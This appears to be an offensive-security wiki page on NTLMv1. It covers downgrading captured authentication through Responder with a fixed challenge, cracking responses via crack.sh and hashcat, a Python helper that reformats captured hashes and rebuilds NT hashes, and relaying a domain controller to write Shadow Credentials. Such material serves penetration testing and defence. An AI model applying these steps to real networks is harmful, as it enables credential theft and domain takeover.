NTLMv1
NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks and should be disabled wherever possible. Every modern Windows version supports its successor, NT LAN Manager version 2 (NTLMv2), which should be used instead.
A captured NTLMv1 (NetNTLMv1) challenge-response, as printed by Responder and consumed by hashcat mode 5500, has the form user::DOMAIN:LM_response:NT_response:server_challenge, where the two responses are 24 bytes (48 hex characters) each and the server challenge is 8 bytes (16 hex characters). The NT response is three independent DES-ECB encryptions of the challenge under keys taken from the user's NT hash, which is why it can be cracked back to the NT hash itself rather than to a password.
Downgrading
In environments where NT LAN Manager version 1 is still permitted, an NTLMv1 response can be obtained from a target computer by coercing it to authenticate to a listener under our control.
This was partially described in the Coercion section. Before triggering the callback, edit Responder.conf and change the 'Challenge' value from its default of Random to 1122334455667788, the fixed challenge that crack.sh's NetNTLMv1 rainbow tables were generated for.
Then start Responder with the options that force the NTLMv1 downgrade and disable Extended Session Security (--lm and --disable-ess), so that the captured response is computed directly over the fixed challenge rather than over a value mixed with a client nonce.
Cracking NTLMv1
As documented by crack.sh, an NTLMv1 response with ESS/SSP negotiated is recognisable from its LM response field: instead of a real LM response it carries an 8-byte client nonce followed by 16 zero bytes (in hex, 16 characters of nonce and 32 zeros). In that case the DES operations were performed over MD5(server_challenge || client_nonce) truncated to 8 bytes, not over the server challenge itself.
Once a response has been captured, reformat it with EvilMog's ntlmv1-multi tool into the form crack.sh or hashcat expects. Alternatively, assless-chaps can check the challenge/response against a database of NT hashes you already hold, with no cracking service involved.
If ESS/SSP could not be disabled with Responder, crack.sh's rainbow tables no longer apply, because the fixed challenge never reaches the DES operation. The response can still be submitted to crack.sh and cracked there for a fee.
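As an added example, not code from the original page or from the ntlmv1-multi or crack.sh projects, the following Python mirrors the pre-cracking steps above: it parses a Responder NetNTLMv1 line, detects ESS/SSP from the LM response field, checks whether the fixed 1122334455667788 challenge was used, emits the crack.sh NTHASH form when rainbow tables apply and the DES-block form used by hashcat mode 14000 otherwise, and shows how the 16-byte NT hash is reassembled from recovered DES keys. The sample lines are constructed (the response bytes are placeholders, not real DES output), and the NetNTLMv1 class and helper names are my own.

```python
import hashlib
from dataclasses import dataclass

# Fixed server challenge that crack.sh's NetNTLMv1 rainbow tables assume;
# this is the value to set as 'Challenge' in Responder.conf.
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")

# Constructed sample captures in Responder / hashcat -m 5500 format
# (user::DOMAIN:LMresp:NTresp:challenge). The response bytes are placeholders,
# not real DES output; they only exercise parsing and reformatting.
SAMPLE_NO_ESS = ("svc_backup::CORP:ad23f0e9c4b1d7a68e1f2c3d4b5a69788d1e2f3a4b5c6d7e:"
                 "5c7e1d3a9b2f4e6d8a1c3e5b7d9f2a4c6e8b1d3f5a7c9e2b:1122334455667788")
SAMPLE_ESS = ("svc_backup::CORP:2f9a4c1e7b3d5f0800000000000000000000000000000000:"
              "e3a1b5c7d9f2468b0c1e3a5d7f9b2d4f6a8c0e1b3d5f7a9c:1122334455667788")


@dataclass
class NetNTLMv1:
    user: str
    domain: str
    lm_response: bytes       # 24 bytes
    nt_response: bytes       # 24 bytes: three 8-byte DES-ECB blocks
    server_challenge: bytes  # 8 bytes

    @classmethod
    def parse(cls, line: str) -> "NetNTLMv1":
        parts = line.strip().split(":")
        if len(parts) != 6 or parts[1] != "":
            raise ValueError("expected user::DOMAIN:LMresp:NTresp:challenge")
        user, _, domain, lm_hex, nt_hex, chal_hex = parts
        lm, nt, chal = bytes.fromhex(lm_hex), bytes.fromhex(nt_hex), bytes.fromhex(chal_hex)
        if len(lm) != 24 or len(nt) != 24 or len(chal) != 8:
            raise ValueError("bad field length")
        return cls(user, domain, lm, nt, chal)

    @property
    def uses_ess(self) -> bool:
        # With ESS/SSP the LM response field is an 8-byte client nonce followed by 16 zero bytes.
        return self.lm_response[8:] == bytes(16) and self.lm_response[:8] != bytes(8)

    @property
    def effective_challenge(self) -> bytes:
        # Without ESS the DES plaintext is the server challenge itself. With ESS it is
        # MD5(server_challenge || client_nonce)[:8], so the fixed challenge never reaches
        # DES and rainbow tables built on 1122334455667788 cannot be used.
        if not self.uses_ess:
            return self.server_challenge
        return hashlib.md5(self.server_challenge + self.lm_response[:8]).digest()[:8]

    def rainbow_table_crackable(self) -> bool:
        return not self.uses_ess and self.server_challenge == FIXED_CHALLENGE

    def to_cracksh(self) -> str:
        # crack.sh's NetNTLMv1 rainbow tables take NTHASH:<48 hex chars of the NT response>.
        if not self.rainbow_table_crackable():
            raise ValueError("ESS negotiated or non-fixed challenge: rainbow tables do not apply")
        return "NTHASH:" + self.nt_response.hex()

    def to_hashcat_14000(self) -> list[str]:
        # Fallback: each 8-byte block of the NT response is DES-ECB(plaintext = effective
        # challenge) under a key derived from NT-hash bytes 0-6, 7-13 and 14-15 (zero padded).
        # hashcat -m 14000 takes <ciphertext>:<plaintext>; blocks 1 and 2 recover 14 of the
        # 16 NT-hash bytes. The third block has only 2^16 possible keys and is brute-forced
        # separately (that step needs a DES implementation and is not shown here).
        pt = self.effective_challenge.hex()
        return [self.nt_response[i:i + 8].hex() + ":" + pt for i in (0, 8)]


def expand_des_key(key7: bytes) -> bytes:
    """7 key bytes -> 8 DES key bytes, odd parity in each low bit (MS-NLMP key derivation)."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:
            b |= 1
        out.append(b)
    return bytes(out)


def collapse_des_key(key8: bytes) -> bytes:
    """Inverse of expand_des_key: drop the parity bits to get back the 7 NT-hash bytes."""
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def reassemble_nt_hash(des_key1: bytes, des_key2: bytes, last_two: bytes) -> bytes:
    """Rebuild the 16-byte NT hash from two recovered DES keys and the brute-forced tail."""
    if len(last_two) != 2:
        raise ValueError("tail must be the 2 NT-hash bytes recovered from the third DES block")
    return collapse_des_key(des_key1) + collapse_des_key(des_key2) + last_two


if __name__ == "__main__":
    for line in (SAMPLE_NO_ESS, SAMPLE_ESS):
        h = NetNTLMv1.parse(line)
        print(f"{h.user}@{h.domain}: ESS={h.uses_ess} effective_challenge={h.effective_challenge.hex()}")
        if h.rainbow_table_crackable():
            print("  crack.sh:", h.to_cracksh())
        else:
            print("  hashcat -m 14000:", *h.to_hashcat_14000())
```

The ESS check is the same heuristic a human applies to a Responder line (a nonce and then nothing but zeros in the LM field); effective_challenge makes explicit why that case defeats the fixed-challenge tables, and collapse_des_key is the step that turns two recovered 8-byte DES keys back into the first 14 bytes of the NT hash.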
Attacking a Domain Controller
If NTLMv1 is enabled, the coerced NTLMv1 authentication of one domain controller can be relayed to LDAP on a second domain controller and used to write to the coerced DC's own msDS-KeyCredentialLink attribute (Shadow Credentials), because a domain controller is able to modify that attribute on itself. Two domain controllers are required because an NTLM authentication cannot be relayed back to the host it originated from.